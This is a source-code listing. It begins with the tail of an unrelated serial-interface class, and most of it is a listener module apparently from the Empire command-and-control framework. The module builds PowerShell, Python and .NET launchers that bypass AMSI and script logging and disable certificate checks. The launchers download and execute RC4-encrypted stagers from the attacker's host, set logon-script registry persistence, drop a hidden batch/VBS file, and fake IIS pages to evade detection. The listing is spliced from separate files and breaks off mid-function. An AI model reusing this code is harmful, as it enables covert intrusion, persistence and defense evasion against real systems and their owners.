RNS.log("Interface "+str(self)+" is unlocking flow control due to time-out. This should not happen. Your hardware might have missed a flow-control READY command, or maybe it does not support flow-control.", RNS.LOG_WARNING)
self.process_queue()
if self.beacon_i != None and self.beacon_d != None:
if self.first_tx != None:
if time.time() > self.first_tx + self.beacon_i:
RNS.log("Interface "+str(self)+" is transmitting beacon data: "+str(self.beacon_d.decode("utf-8")), RNS.LOG_DEBUG)
self.first_tx = None
self.processOutgoing(self.beacon_d)
except Exception as e:
self.online = False
RNS.log("A serial port error occurred, the contained exception was: "+str(e), RNS.LOG_ERROR)
RNS.log("The interface "+str(self)+" experienced an unrecoverable error and is being torn down. Restart Reticulum to attempt to open this interface again.", RNS.LOG_ERROR)
if RNS.Reticulum.panic_on_interface_error:
RNS.panic()
def __str__(self):
return "KISSInterface["+self.name+"]"
|
http_new.py
|
from __future__ import print_function
from builtins import str
from builtins import object
import logging
import base64
import sys
import random
import string
import os
import ssl
import time
import copy
import json
from pydispatch import dispatcher
from flask import Flask, request, make_response, send_from_directory
import commands
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import templating
from lib.common import obfuscation
from lib.common import bypasses
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'Cookie': {
'Description': 'Custom Cookie Name',
'Required': False,
'Value': ''
},
'StagerURI': {
'Description': 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required': False,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'SlackToken': {
'Description': 'Your SlackBot API token to communicate with your Slack instance.',
'Required': False,
'Value': ''
},
'SlackChannel': {
'Description': 'The Slack channel or DM that notifications will be sent to.',
'Required': False,
'Value': '#general'
},
'DomainCheck' : {
'Description' : 'Only execute the stager if the machine is joined to the specified domain.',
'Required' : False,
'Value' : ''
},
'BackupHostsSource' : {
'Description' : 'URL from which to fetch backup hosts once SwitchRetry attempts have failed.',
'Required' : False,
'Value' : ''
},
'SwitchRetry' : {
'Description' : 'Number of failed retries before switching to the backup hosts source.',
'Required' : True,
'Value' : 5
},
}
# required:
self.mainMenu = mainMenu
self.threads = {}
self.dotnetVersion = {'20':'35','40':'45'}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
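# Illustrative note (not original listener code): DefaultProfile splits on '|' into
# "uris|user-agent|extra headers...", so the default value above yields
#   self.uris == ['admin/get.php', 'news.php', 'login/process.php']
# with the Mozilla string used as the User-Agent and any remaining '|'-separated
# "Key:Value" entries treated as custom headers.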
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
self.session_cookie = ''
# if the current session cookie is empty, generate a random cookie name
if self.session_cookie == '':
self.options['Cookie']['Value'] = self.generate_cookie()
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
backupHostsSource = listenerOptions['BackupHostsSource']['Value']
domainCheck = listenerOptions['DomainCheck']['Value']
switchRetry = listenerOptions['SwitchRetry']['Value']
cookie = listenerOptions['Cookie']['Value']
# generate a new cookie if the current session cookie is empty, to avoid an empty cookie when multiple listeners are created
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='" + userAgent + "';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "');"
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $" + helpers.generate_random_script_var_name("wc") + ".Proxy;"
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization(
'$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization(
"try{$ig=$" + helpers.generate_random_script_var_name(
"wc") + ".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
#autorun=helpers.enc_powershell("$a=New-Object System.Net.WebClient;$a.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$a.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;$a.DownloadString(\""+host+"/download/po\")|iex;")
#cmd="do{try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$a=New-Object System.Net.WebClient;$a.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$a.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;$a.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;$a.DownloadString('"+host+"/download/po')|iex;break;}catch{write-verbose $_.Exception.Message -Verbose;}}while($true);"
cmd="[Net.ServicePointManager]::SecurityProtocol=3072;[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$a=New-Object System.Net.WebClient;$a.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$a.Credentials=$a.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;$retry=0;$ho='%s';while(%s){try{$retry=$retry+1;$b=$a.GetType();$b.InvokeMember('DownloadString','Public,InvokeMethod,Instance',$null,$a,$ho+'/download/po')|iex;break;}catch{sleep(10);if($retry -eq %s){$ho='%s'}}}" % (host,"$true" if domainCheck =='' else "[Environment]::UserDomainName -eq '"+domainCheck+"'",switchRetry,host if backupHostsSource=='' else backupHostsSource)
#stager+="$filename=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"dXBkYXRlLnZicw==\"));"
stager+="$filename=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"dXBkYXRlLmJhdA==\"));"
#so ugly, handle dcloud temp dir
stager+="if((get-wmiobject win32_computersystem | fl model | out-String).indexof('VMware') -ge 0){$filepath=Resolve-Path \"$env:LOCALAPPDATA\..\";}else{$filepath=$env:TEMP;};"
#stager+="New-ItemProperty -Path 'HKCU:Software\Microsoft\Windows\CurrentVersion\Run\' -Name Update -PropertyType String -Value \"$filepath\$filename\" -force|out-null;"
stager+="New-ItemProperty -Path 'HKCU:Environment\' -Name UserInitMprLogonScript -PropertyType String -Value \"$filepath\$filename\" -force|out-null;"
#cmd=base64.b64encode('''Set objShell = CreateObject("Wscript.shell"):objShell.run "powershell -wi 1 -co ""%s""",0'''% cmd)
cmd=base64.b64encode(''':On Error Resume Next\r\necho off & cls\r\nstart wscript -e:vbs "%%~f0"\r\nSet objShell = CreateObject("Wscript.shell"):objShell.run "powershell -wi 1 -co ""%s""",0'''% cmd)
stager+="[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('%s'))|out-file $filepath\$filename -Encoding ASCII;" %cmd
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket.decode('UTF-8'))
stager += helpers.randomize_capitalization(
"$data=$" + helpers.generate_random_script_var_name("wc") + ".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (
launchEncoded)
return launcher
else:
return launcherBase
if language.startswith('do'):
version=language[6:]
f = open(self.mainMenu.installPath + "./data/agent/launchers/http.cs",'r')
code = f.read()
f.close()
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
if proxy.lower() != 'none':
if proxy.lower() != 'default':
code = code.replace('wc.Proxy = WebRequest.DefaultWebProxy;', 'wc.Proxy = new WebProxy("%s");' % proxy)
else:
code = code.replace('wc.Proxy = WebRequest.DefaultWebProxy;', '')
if backupHostsSource != "":
code = code.replace('//ser=wc.DownloadString("").Trim();','ser=wc.DownloadString("%s").Trim();' % backupHostsSource)
if domainCheck != "":
code = code.replace('System.Environment.UserDomainName.Equals("")','System.Environment.UserDomainName.Equals("%s")' % domainCheck)
else:
code = code.replace('System.Environment.UserDomainName.Equals("")','true')
if proxyCreds.lower() != 'none':
if proxyCreds.lower() != "default":
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
code = code.replace('wc.Proxy.Credentials = CredentialCache.DefaultCredentials;', 'wc.Proxy.Credentials = new NetworkCredential(%s,%s,%s);' % (usr,domain,password))
else:
usr = username.split('\\')[0]
code = code.replace('wc.Proxy.Credentials = CredentialCache.DefaultCredentials;', 'wc.Proxy.Credentials = new NetworkCredential(%s,%s);' % (usr,password))
else:
code = code.replace('wc.Proxy.Credentials = CredentialCache.DefaultCredentials;', '')
routingPacket35 = packets.build_routing_packet(stagingKey, sessionID='00000000', language='DOTNET35', meta='STAGE0', additional='None', encData='')
b64RoutingPacket35 = base64.b64encode(routingPacket35)
routingPacket45 = packets.build_routing_packet(stagingKey, sessionID='00000000', language='DOTNET45', meta='STAGE0', additional='None', encData='')
b64RoutingPacket45 = base64.b64encode(routingPacket45)
code = code.replace('string u = "";', 'string u = "%s";' % userAgent)
code = code.replace('string k = "";', 'string k = "%s";' % stagingKey)
code = code.replace('string ser = Encoding.Unicode.GetString(Convert.FromBase64String(""));', 'string ser = Encoding.Unicode.GetString(Convert.FromBase64String("%s"));' % helpers.enc_powershell(host))
code = code.replace('wc.Headers.Add("Cookie", "35");', 'wc.Headers.Add("Cookie", "%s=%s");' % (cookie, b64RoutingPacket35))
code = code.replace('wc.Headers.Add("Cookie", "45");', 'wc.Headers.Add("Cookie", "%s=%s");' % (cookie, b64RoutingPacket45))
f = open(self.mainMenu.installPath + "./data/dotnet/compiler/data/Tasks/CSharp/Launcher.task",'w')
f.write(code)
f.close()
code = helpers.get_dotnet_module_assembly_with_source(self.mainMenu.installPath,'Launcher','Launcher.task',version,'1')
return code
else:
print(helpers.color(
"[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
# headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
# Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
#stager = stager.encode('UTF-8')
#randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
# There doesn't seem to be any conditions in which the encrypt flag isn't set so the other
# if/else statements are irrelevant
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, stager)
else:
# otherwise return the standard stager
return stager
elif language.lower().startswith('dotnet'):
# read in the stager base
version=language[6:]
f = open("%s/data/agent/stagers/http.cs" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
#Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
#headers = ','.join(customHeaders)
stager = stager.replace("string customHeaders = \"\";","string customHeaders = \""+headers+"\";")
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
#Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
f = open(self.mainMenu.installPath + "./data/dotnet/compiler/data/Tasks/CSharp/Stager.task",'w')
f.write(stager)
f.close()
stager = helpers.get_dotnet_module_assembly_with_source(self.mainMenu.installPath,'Stager','Stager.task',version,'2')
return base64.b64encode(stager)
else:
print(helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse.decode('UTF-8') + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace(
